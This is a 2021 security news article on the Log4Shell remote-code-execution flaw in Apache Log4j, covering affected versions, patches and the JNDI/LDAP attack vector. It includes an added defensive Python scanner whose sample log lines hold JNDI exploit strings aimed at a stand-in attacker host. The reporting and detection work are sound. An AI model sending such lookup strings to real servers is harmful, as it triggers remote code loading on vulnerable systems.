
The “Log4Shell” vulnerability poses a serious threat to applications that use the “ubiquitous” Java logging package Apache Log4j


Adam Bannister December 10, 2021 14:56 UTC

Update time: December 10, 2021 14:59 UTC

A wide range of enterprise software is affected by the flaw, which carries the maximum CVSS score of 10

The maintainers of the popular Java logging library Apache Log4j have issued an urgent patch for a critical vulnerability that may lead to remote code execution (RCE) in many applications.

The relative ease of exploitation, the control it hands an attacker over the target server, and the ubiquity of Log4j combine to make the situation serious.

The vulnerability (CVE-2021-44228), dubbed “Log4Shell”, was reported by Alibaba’s Zhaojun Chen and has been assigned the maximum CVSS score of 10.

Downstream impact

Versions 2.0-beta9 through 2.14.1 (inclusive) are all affected by the flaw.

The maintainers of Apache Log4j released a new version – 2.15.0 – today, within a day of a proof-of-concept (PoC) surfacing on Twitter and GitHub, along with mitigation measures for those who cannot update immediately.

“Now it needs to flow downstream to Apache Struts2, Solr, Linux distributions, vendors, equipment, etc.,” tweeted British security expert Kevin Beaumont.


According to a newly published GitHub repository, potentially vulnerable applications include any application that uses Apache Struts, as well as the iCloud, Steam, Twitter, Cloudflare, Amazon and Tesla websites.

“Although this appears as a Minecraft issue (laughs), it will affect a wide range of enterprise software for some time,” Beaumont added.

According to Free Wortley and Chris Thompson, CEO and developer respectively at the open source data security platform LunaSec, many open source projects have already addressed the problem in their own applications.

Attack vector

The pair have documented various exploits and other key information about the vulnerability in a blog post published yesterday (December 9), which is still being updated as new details emerge.

They say a server is vulnerable if it is running a vulnerable version of Log4j, exposes an endpoint over any protocol that lets an attacker send an exploit string, and has a log statement that logs out that string from the request.

According to the CVE description, Apache Log4j2 versions 2.14.1 and below do not protect against attacker-controlled LDAP (Lightweight Directory Access Protocol) and other JNDI-related endpoints.

“When message search and replacement is enabled, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from the LDAP server,” it said.

This behavior is disabled by default in Log4j 2.15.0, and “users are strongly recommended not to enable it”, the maintainers advise.
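As an added example (not code from the article, from Log4j or from LunaSec), the following Python checks whether a reported Log4j version falls inside the affected range stated above and scans constructed log lines for the `${jndi:...}` lookup string that message substitution resolves; the host name in the sample lines is a placeholder, not a real indicator.

```python
import re
from typing import Optional

# Added example: version-range check for CVE-2021-44228 (2.0-beta9 through 2.14.1)
# plus a detector for JNDI lookup strings in logged request data. All sample data
# below is constructed.

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?$", re.I)

def version_key(version: str) -> tuple:
    """Map a Log4j version string to a sortable tuple; pre-releases sort before the final."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version: {version!r}")
    major, minor, patch, stage, stage_num = m.groups()
    stage_rank = {"beta": 0, "rc": 1}.get((stage or "").lower(), 2)  # final release ranks last
    return (int(major), int(minor), int(patch or 0), stage_rank, int(stage_num or 0))

def is_affected_version(version: str) -> bool:
    """True if the version lies in the advisory's range: 2.0-beta9 <= v <= 2.14.1."""
    return version_key("2.0-beta9") <= version_key(version) <= version_key("2.14.1")

# `${jndi:<scheme>:...}` is the lookup that Log4j's message substitution resolves;
# finding it in request data that gets logged is the condition the article describes.
_JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.I)

def find_jndi_lookup(line: str) -> Optional[str]:
    """Return the JNDI scheme (e.g. 'ldap', 'rmi', 'dns') found in a log line, or None."""
    m = _JNDI_RE.search(line)
    return m.group(1).lower() if m else None

def scan_log(lines):
    """Yield (line_number, scheme) for every line containing a JNDI lookup."""
    for n, line in enumerate(lines, 1):
        scheme = find_jndi_lookup(line)
        if scheme:
            yield n, scheme

if __name__ == "__main__":
    # Constructed access-log lines; attacker.example is a placeholder host.
    sample = [
        '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
        '10.0.0.6 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
        '10.0.0.7 - - "GET /?q=${JNDI:RMI://attacker.example/b} HTTP/1.1" 404 "-"',
    ]
    for n, scheme in scan_log(sample):
        print(f"line {n}: JNDI lookup via {scheme}")
    print("2.14.1 affected:", is_affected_version("2.14.1"))
```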


According to another blog post cited by Wortley and Thompson, Java Development Kit (JDK) versions higher than 6u211, 7u201, 8u191 and 11.0.1 are not affected by the LDAP attack vector.

However, other attack vectors may still lead to RCE, including targets and classes present on the Apache Tomcat server, as documented by Veracode in 2019.

Because such Java vulnerabilities are so common, security researchers have created tools such as the marshalsec project to exploit them, Wortley and Thompson note.

The two suggested that security teams protect sensitive data by deploying tokenization.

Beaumont pointed out that the first fix, version 2.15.0-rc1, was bypassed, so users should apply log4j-2.15.0-rc2. He also observed: “Your JDK configuration may prevent you from being exploited. Some distributions provide security configurations by default.”
